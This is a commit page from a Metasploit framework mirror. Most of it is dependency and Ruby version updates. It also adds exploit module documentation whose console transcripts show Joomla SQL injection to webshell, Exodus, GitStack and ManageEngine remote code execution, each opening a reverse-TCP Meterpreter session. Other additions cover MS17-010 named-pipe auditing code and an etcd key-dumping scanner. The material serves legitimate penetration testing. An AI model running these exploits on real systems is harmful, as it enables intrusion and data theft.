infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'goliath' into MS-3062_workspaces

GSoC/Meterpreter_Web_Console
James Barnett 2018-03-30 16:35:26 -05:00
parent ecbbf1d940 21113f28ba
commit 7d58b0a5f4
51 changed files with 1886 additions and 626 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.ruby-version
View File

@ -1 +1 @@
2.4.3
2.5.1

6
.travis.yml
View File

@ -11,9 +11,9 @@ addons:
- graphviz
language: ruby
rvm:
- '2.2'
- '2.3.6'
- '2.4.3'
- '2.3.7'
- '2.4.4'
- '2.5.1'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

2
Dockerfile
View File

@ -1,4 +1,4 @@
FROM ruby:2.4.3-alpine3.7
FROM ruby:2.5.1-alpine3.7
LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"

16
Gemfile
View File

@ -19,23 +19,13 @@ group :development do
# module documentation
gem 'octokit'
# Metasploit::Aggregator external session proxy
gem 'metasploit-aggregator' if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'google-protobuf', "3.5.1" if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
gem 'grpc', "1.8.3" if [
'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
# disabled during 2.5 transition until aggregator is available
#gem 'metasploit-aggregator'
end
group :development, :test do
# automatically include factories from spec/factories
gem 'factory_girl_rails'
gem 'factory_bot_rails'
# Make rspec output shorter and more useful
gem 'fivemat'
# running documentation generation tasks and rspec tasks

69
Gemfile.lock
View File

@ -116,16 +116,16 @@ GEM
coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.3)
daemons (1.2.4)
daemons (1.2.6)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.3.0)
erubis (2.7.0)
eventmachine (1.2.3)
factory_girl (4.9.0)
eventmachine (1.2.5)
factory_bot (4.8.2)
activesupport (>= 3.0.0)
factory_girl_rails (4.9.0)
factory_girl (~> 4.9.0)
factory_bot_rails (4.8.2)
factory_bot (~> 4.8.2)
railties (>= 3.0.0)
faker (1.8.7)
i18n (>= 0.7)
@ -133,49 +133,26 @@ GEM
multipart-post (>= 1.2, < 3)
filesize (0.1.1)
fivemat (1.3.6)
google-protobuf (3.5.1)
googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
googleauth (0.6.2)
faraday (~> 0.12)
jwt (>= 1.4, < 3.0)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.8.3)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
jwt (2.1.0)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.2.2)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (1.0.0)
grpc
rex-arch
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.13)
metasploit-credential (3.0.1)
metasploit-concern
metasploit-model
metasploit_data_models
pg
metasploit_data_models (>= 3.0.0)
net-ssh
pg (~> 0.15)
railties
rex-socket
rubyntlm
@ -185,7 +162,7 @@ GEM
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.32)
metasploit_data_models (2.0.16)
metasploit_data_models (3.0.0)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
@ -201,7 +178,6 @@ GEM
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.4)
multi_json (1.13.1)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.2.0)
@ -213,7 +189,6 @@ GEM
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
@ -235,7 +210,7 @@ GEM
method_source (~> 0.9.0)
public_suffix (3.0.2)
rack (1.6.9)
rack-protection (1.5.3)
rack-protection (1.5.5)
rack
rack-test (0.6.3)
rack (>= 1.0)
@ -245,8 +220,8 @@ GEM
activesupport (>= 4.2.0, < 5.0)
nokogiri (~> 1.6)
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
rails-html-sanitizer (1.0.4)
loofah (~> 2.2, >= 2.2.2)
railties (4.2.10)
actionpack (= 4.2.10)
activesupport (= 4.2.10)
@ -293,7 +268,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.12)
rex-socket (0.1.13)
rex-core
rex-sslscan (0.1.5)
rex-core
@ -338,11 +313,6 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
signet (0.8.1)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.16.1)
docile (~> 1.1)
json (>= 1.8, < 3)
@ -354,18 +324,18 @@ GEM
tilt (>= 1.3, < 3)
sqlite3 (1.3.13)
sshkey (1.9.0)
thin (1.7.1)
thin (1.7.2)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (0.20.0)
thread_safe (0.3.6)
tilt (2.0.7)
tilt (2.0.8)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2018.3)
tzinfo-data (1.2018.4)
tzinfo (>= 1.0.0)
windows_error (0.1.2)
xdr (2.0.0)
@ -378,11 +348,8 @@ PLATFORMS
ruby
DEPENDENCIES
factory_girl_rails
factory_bot_rails
fivemat
google-protobuf (= 3.5.1)
grpc (= 1.8.3)
metasploit-aggregator
metasploit-framework!
octokit
pry

149
LICENSE_GEMS
View File

@ -1,130 +1,135 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.0.2, MIT
actionpack, 4.2.9, MIT
actionview, 4.2.9, MIT
activemodel, 4.2.9, MIT
activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0"
Ascii85, 1.0.3, MIT
actionpack, 4.2.10, MIT
actionview, 4.2.10, MIT
activemodel, 4.2.10, MIT
activerecord, 4.2.10, MIT
activesupport, 4.2.10, MIT
addressable, 2.5.2, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown
backports, 3.8.0, MIT
arel-helpers, 2.6.1, MIT
backports, 3.11.1, MIT
bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby
bcrypt_pbkdf, 1.0.0, MIT
bindata, 2.4.3, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.15.1, MIT
coderay, 1.1.1, MIT
bundler, 1.16.1, MIT
coderay, 1.1.2, MIT
concurrent-ruby, 1.0.5, MIT
crass, 1.0.3, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT
dnsruby, 1.60.2, "Apache 2.0"
docile, 1.3.0, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT
factory_bot, 4.8.2, MIT
factory_bot_rails, 4.8.2, MIT
faker, 1.8.7, MIT
faraday, 0.14.0, MIT
filesize, 0.1.1, MIT
fivemat, 1.3.5, MIT
google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.4.1, "New BSD"
fivemat, 1.3.6, MIT
google-protobuf, 3.5.1, "New BSD"
googleapis-common-protos-types, 1.0.1, "Apache 2.0"
googleauth, 0.6.2, "Apache 2.0"
grpc, 1.8.3, "Apache 2.0"
hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
i18n, 0.9.5, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby
jwt, 1.5.6, MIT
jwt, 2.1.0, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
loofah, 2.2.0, MIT
memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD"
metasploit-aggregator, 1.0.0, "New BSD"
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.15.0, "New BSD"
metasploit-credential, 2.0.13, "New BSD"
metasploit-framework, 5.0.0, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT
mini_portile2, 2.2.0, MIT
minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.16, "New BSD"
metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
method_source, 0.9.0, MIT
mini_portile2, 2.3.0, MIT
minitest, 5.11.3, MIT
mqtt, 0.5.0, MIT
msgpack, 1.2.4, "Apache 2.0"
multi_json, 1.13.1, MIT
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.1.0, BSD
nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT
net-ssh, 4.2.0, MIT
network_interface, 0.0.2, MIT
nexpose, 7.2.0, BSD
nokogiri, 1.8.2, MIT
octokit, 4.8.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pdf-reader, 2.1.0, MIT
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
pry, 0.10.4, MIT
public_suffix, 2.0.5, MIT
rack, 1.6.8, MIT
pry, 0.11.3, MIT
public_suffix, 3.0.2, MIT
rack, 1.6.9, MIT
rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
rails-dom-testing, 1.0.9, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.9, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.11, unknown
railties, 4.2.10, MIT
rake, 12.3.0, MIT
rb-readline, 0.5.5, BSD
recog, 2.1.18, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.9, "New BSD"
rex-arch, 0.1.13, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-core, 0.1.13, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.15, "New BSD"
rex-exploitation, 0.1.17, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
rex-ole, 0.1.6, "New BSD"
rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-powershell, 0.1.77, "New BSD"
rex-random_identifier, 0.1.4, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD"
rex-socket, 0.1.10, "New BSD"
rex-sslscan, 0.1.5, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD"
rex-text, 0.2.16, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec, 3.7.0, MIT
rspec-core, 3.7.1, MIT
rspec-expectations, 3.7.0, MIT
rspec-mocks, 3.7.0, MIT
rspec-rails, 3.7.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT
rspec-support, 3.7.1, MIT
ruby-macho, 1.1.0, MIT
ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT
slop, 3.6.0, MIT
signet, 0.8.1, "Apache 2.0"
simplecov, 0.16.0, MIT
simplecov-html, 0.10.2, MIT
sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
thor, 0.20.0, MIT
thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
tzinfo, 1.2.5, MIT
tzinfo-data, 1.2018.3, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
yard, 0.9.9, MIT
yard, 0.9.12, MIT

25
data/wordlists/named_pipes.txt Normal file
View File

@ -0,0 +1,25 @@
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

BIN
db/modules_metadata_base.pstore
View File

Binary file not shown.

5
documentation/modules/auxiliary/admin/smb/ms17_010_command.md
View File

@ -21,6 +21,11 @@ To be able to use auxiliary/admin/smb/ms17_010_command:
You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
If you're having trouble configuring an anonymous named pipe,
Microsoft's
[documentation](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously)
on the topic may be helpful.
## Verification Steps
At the minimum, you should be able use psexec to get a session with a valid credential using the following:

108
documentation/modules/auxiliary/scanner/etcd/open_key_scanner.md Normal file
View File

@ -0,0 +1,108 @@
## Vulnerable Application
etcd is a distributed reliable key-value store, which when used in an open and default configuration gives
unauthenticated users access to the data stored via HTTP API.
### Centos 7.1
1. `yum install etcd`
2. `vi /etc/etcd/etcd.conf` replace (and uncomment) items with `localhost` for your IP.
3. `systemctl start etcd; systemctl enable etcd`
4. On Centos 7.1 you need to mod (or disable) the firewall: `systemctl stop firewalld`
5. Lastly, lets add a key-value for interest: `curl http://[IP]:2379/v2/keys/supersecret -XPUT -d value="password!"`
### Docker
1. `docker run -p 2379:2379 miguelgrinberg/easy-etcd`
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/scanner/etcd/open_key_scanner```
4. Do: ```set rhosts [IPs]```
5. Do: ```run```
6. You should get a JSON response, and the data saved to `loot`.
## Scenarios
### etcd 3.2.15 on CentOS 7.1
```
msf5 > use auxiliary/scanner/etcd/open_key_scanner
msf5 auxiliary(scanner/etcd/open_key_scanner) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/etcd/open_key_scanner) > run
[+] 2.2.2.2:2379
Version: {"etcdserver":"3.2.15","etcdcluster":"3.2.0"}
Data: {
"action": "get",
"node": {
"dir": true,
"nodes": [
{
"key": "/supersecret",
"value": "password",
"modifiedIndex": 6,
"createdIndex": 6
}
]
}
}
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
2.2.2.2 etcd.data etcd.keys text/plain etcd keys /root/.msf4/loot/20180325144351_default_2.2.2.2_etcd.data_425280.txt
msf5 auxiliary(scanner/etcd/open_key_scanner) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
2.2.2.2 2379 tcp etcd open {"etcdserver":"3.2.15","etcdcluster":"3.2.0"}
```
### etcd in Docker
```
msf5 > use auxiliary/scanner/etcd/open_key_scanner
msf5 auxiliary(scanner/etcd/open_key_scanner) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 auxiliary(scanner/etcd/open_key_scanner) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/etcd/open_key_scanner) > run
[+] 127.0.0.1:2379
Version: {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}
Data: {
"action": "get",
"node": {
"dir": true
}
}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/etcd/open_key_scanner) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
127.0.0.1 etcd.data etcd.keys text/json etcd keys /root/.msf4/loot/20180328092245_default_127.0.0.1_etcd.data_260058.txt
msf5 auxiliary(scanner/etcd/open_key_scanner) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
127.0.0.1 2379 tcp etcd open {"etcdserver":"3.1.3","etcdcluster":"3.1.0"}
```

45
documentation/modules/exploit/unix/webapp/joomla_comfields_sqli_rce.md Normal file
View File

@ -0,0 +1,45 @@
## Vulnerable Application
This module exploits a SQL Injection vulnerability in the `com_fields` component which was introduced to the core of Joomla in version 3.7.0.
With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
## Verification
1. Start msfconsole
2. Do: `use exploit/unix/webapp/joomla_comfields_sqli_rce`
3. Do: `set rhost [ip]`
4. Do: `set tageturi [uri]`
5. Do: `exploit`
6. Get a shell
## Scenarios
### Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated
```
msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run
[*] Started reverse TCP handler on 172.22.222.138:4444
[*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ]
[*] 172.22.222.122:80 - Retrieved cookie [ ejn9i2c5srk6gchhai4cikdkm3 ]
[*] 172.22.222.122:80 - Retrieved unauthenticated cookie [ 33effe3d96e4c5e749f33b9d639ca36b ]
[+] 172.22.222.122:80 - Successfully authenticated
[*] 172.22.222.122:80 - Creating file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Following redirect to [ /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D ]
[*] 172.22.222.122:80 - Token [ df2760a9614efc2566917148ee379c42 ] retrieved
[*] 172.22.222.122:80 - Template path [ /templates/beez3/ ] retrieved
[*] 172.22.222.122:80 - Insert payload into file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Payload data inserted into [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Executing payload
[*] Sending stage (37543 bytes) to 172.22.222.122
[+] Deleted zM8ZvIAAwxE.php
meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer : WIN-V438RLMESAE
OS : Windows NT WIN-V438RLMESAE 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter >
```

47
documentation/modules/exploit/windows/browser/exodus.md Normal file
View File

@ -0,0 +1,47 @@
## Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. Using the Electron remote code execution vulnerability in protocol handler is possible to inject command line arguments via URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at [Exodus v1.38.0](https://github.com/DanielRTeixeira/Exodus/raw/master/exodus-windows-x64-1.38.0.exe).
## Verification Steps
1. Install Exodus Wallet version `v1.38.0`
2. Start `msfconsole`
3. Do `use exploit/windows/browser/exodus`
4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
5. Do `set LHOST ip`
6. Do `exploit`
7. On the target machine, browse to the malicious URL and launch Exodus
8. Verify the Meterpreter session is opened
## Scenarios
### Exodus Wallet v1.38.0 on Windows 10 Enterprise x64
```
msf > use exploit/windows/browser/exodus
msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/browser/exodus) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Using URL: http://0.0.0.0:80/
msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
[*] Server started.
[*] 172.16.40.149 exodus - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.40.149
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000
msf exploit(windows/browser/exodus) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-PI8214R
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```

68
documentation/modules/exploit/windows/http/gitstack_rce.md Normal file
View File

@ -0,0 +1,68 @@
## Description
An unauthenticated remote code execution vulnerability exists in GitStack through v2.3.10. This
module exploits the vulnerability by sending unauthenticated REST API requests to put the
application in a vulnerable state, if needed, before sending a request to trigger the exploit.
These configuration changes are undone before the module exits. The module has been tested on
GitStack v2.3.10.
## Vulnerable Application
In vulnerable versions of GitStack, a flaw in `Authentication.class.php` allows [unauthenticated remote code execution](https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html) since `$_SERVER['PHP_AUTH_PW']` is passed directly to an `exec` function.
To exploit the vulnerability, the repository web interface must be enabled, a repository must
exist, and a user must have access to the repository.
Note: A passwd file should be created by GitStack for local user accounts.
Default location: `C:\GitStack\data\passwdfile`.
## Verification Steps
* Install a vulnerable GitStack application
* `./msfconsole`
* `use exploit/windows/http/gitstack_rce`
* `set rhost <rhost>`
* `set verbose true`
8 `run`
Note: You may have to run the exploit multiple times since the powershell that is generate has to
be under a certain size.
## Scenarios
### GitStack v2.3.10 on Windows 7 SP1
```
msf5 > use exploit/windows/http/gitstack_rce
msf5 exploit(windows/http/gitstack_rce) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(windows/http/gitstack_rce) > set verbose true
verbose => true
msf5 exploit(windows/http/gitstack_rce) > run
[*] Started reverse TCP handler on 172.22.222.131:4444
[*] Powershell command length: 6103
[-] Web interface is disabled
[-] No repositories found
[+] Web interface successfully enabled
[+] The repository has been successfully created
[+] Created user: ZROTE
[+] User ZROTE added to EsILm
[*] Sending stage (252483 bytes) to 172.22.222.122
[+] ZROTE removed from EsILm
[+] ZROTE has been deleted
[+] Web interface successfully disabled
[+] EsILm has been deleted
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-V438RLMESAE
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```

46
documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md Normal file
View File

@ -0,0 +1,46 @@
exploit/windows/http/manageengine_appmanager_exec.md## Vulnerable Application
This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
**Vulnerable Application Installation Steps**
Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
[http://archives.manageengine.com/applications_manager/13630/](http://archives.manageengine.com/applications_manager/13630/)
## Verification Steps
A successful check of the exploit will look like this:
* Start `msfconsole`
* `use exploit/windows/http/manageengine_appmanager_exec`
* Set `RHOST <RHOST>`
* Set `PAYLOAD windows/meterpreter/reverse_tcp`
* Set `LHOST <LHOST>`
* Run `check`
* **Verify** that you are seeing `The target is vulnerable.` in console.
* Run `exploit`
* **Verify** that you are seeing `Triggering the vulnerability` in console.
* **Verify** that you are seeing `Sending stage to <TARGET>` in console.
* **Verify** that you have your shell.
## Demo
```
msf5 >
msf5 > use exploit/windows/http/manageengine_appmanager_exec
msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Trigerring the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

5
documentation/modules/exploit/windows/smb/ms17_010_psexec.md
View File

@ -19,6 +19,11 @@ To be able to use exploit/windows/smb/ms17_010_psexec:
You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
If you're having trouble configuring an anonymous named pipe,
Microsoft's
[documentation](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously)
on the topic may be helpful.
## Verification Steps
At the minimum, you should be able use psexec to get a session with a valid credential using the following:

2
lib/msf/base/sessions/scriptable.rb
View File

@ -165,7 +165,7 @@ module Scriptable
full_path = self.class.find_script_path(script_name)
if full_path.nil?
print_error("The specified script could not be found: #{script_name}")
print_error("The specified #{self.type} session script could not be found: #{script_name}")
return
end

1
lib/msf/core/exploit/mixins.rb
View File

@ -32,6 +32,7 @@ require 'msf/core/exploit/smb/client'
require 'msf/core/exploit/smb/client/authenticated'
require 'msf/core/exploit/smb/client/local_paths'
require 'msf/core/exploit/smb/client/psexec'
require 'msf/core/exploit/smb/client/pipe_auditor'
require 'msf/core/exploit/smb/client/psexec_ms17_010'
require 'msf/core/exploit/smb/client/remote_paths'
require 'msf/core/exploit/smb/server'

61
lib/msf/core/exploit/smb/client/pipe_auditor.rb Normal file
View File

@ -0,0 +1,61 @@
# -*- coding: binary -*-
#
# This mixin implements the pipe_auditor module's primary functionality
#
module Msf
module Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super
named_pipes = File.join(Msf::Config.data_directory, 'wordlists', 'named_pipes.txt')
register_options([
OptPath.new('NAMED_PIPES', [true, 'List of named pipes to check', named_pipes])
])
end
# Check named pipes, returning the first optionally
#
# @param check_first [Array] Check the specified pipes first
# @param return_first [Boolean] Return the first pipe name and handle
# @return [Array] The list of found pipes (name and handle)
def check_named_pipes(check_first: [], return_first: false)
@found_pipes = []
if check_first.is_a?(Array)
check_first.delete_if { |pipe| pipe.blank? }
elsif check_first.is_a?(String) && check_first.present?
check_first = [check_first]
else
check_first = []
end
named_pipes = check_first + File.readlines(datastore['NAMED_PIPES'])
named_pipes.each do |pipe|
begin
pipe_name = pipe.strip
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# If we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe_name}")
# This is for exploits like ms17_010_psexec
return pipe_name, pipe_handle if return_first
@found_pipes << [pipe_name, pipe_handle]
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe_name} - #{e.message}")
end
end
@found_pipes
end
end
end

456
lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
View File

@ -1,8 +1,8 @@
module Msf
module Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -231,7 +231,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return userAndGroupsAddr, userAndGroupCount
end
def write_what_where(what, where)
if where == 0
raise MS17_010_Error, 'Attempted to write to a NULL pointer!'
@ -299,7 +298,7 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
def fingerprint_os(os)
print_status("Target OS: #{os}")
if os.starts_with? 'Windows 10' or os.starts_with? 'Windows Server 2016' or os.starts_with? 'Windows 8' or os.starts_with? 'Windows Server 2012'
if os.starts_with? 'Windows 10' or os.starts_with? 'Windows Server 2016' or os.starts_with? 'Windows 8' or os.starts_with? 'Windows Server 2012' or os.starts_with? 'Windows RT 9200'
@ctx['os'] = 'WIN8'
@ctx['go_fish'] = false
